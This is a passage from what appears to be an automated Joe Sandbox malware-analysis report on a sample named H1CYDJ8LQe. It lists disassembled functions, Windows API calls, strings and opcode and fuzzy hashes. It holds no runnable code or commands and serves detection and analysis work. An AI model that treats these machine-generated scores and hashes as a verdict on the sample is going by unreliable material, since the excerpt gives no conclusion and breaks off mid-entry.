                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                            Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                            Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                            Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memcmp
                                                            • String ID: '$\$h
                                                            • API String ID: 2205784470-1303700344
                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                            Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                            • __swprintf.LIBCMT ref: 0045EC33
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                            Strings
                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                            • API String ID: 2441338619-1568723262
                                                            • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                            • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                            Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID: @COM_EVENTOBJ
                                                            • API String ID: 327565842-2228938565
                                                            • Opcode ID: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                            • Opcode Fuzzy Hash: 8d68769e25e8d01640c36805b8621208eaf5358c57efe8be0f1ba0a08893845a
                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                            Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                            • String ID: H
                                                            • API String ID: 3613100350-2852464175
                                                            • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                            • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                            Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 4174999648-3243417748
                                                            • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                            • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                            Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 1291720006-3916222277
                                                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                            Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                            Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                            • String ID: crts
                                                            • API String ID: 586820018-3724388283
                                                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                            Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2326526234-1173974218
                                                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                            Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                            • _wcslen.LIBCMT ref: 004335F2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                            • String ID: \
                                                            • API String ID: 321622961-2967466578
                                                            • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                            • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                            Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                            • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                            Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                            • _wprintf.LIBCMT ref: 004340A1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
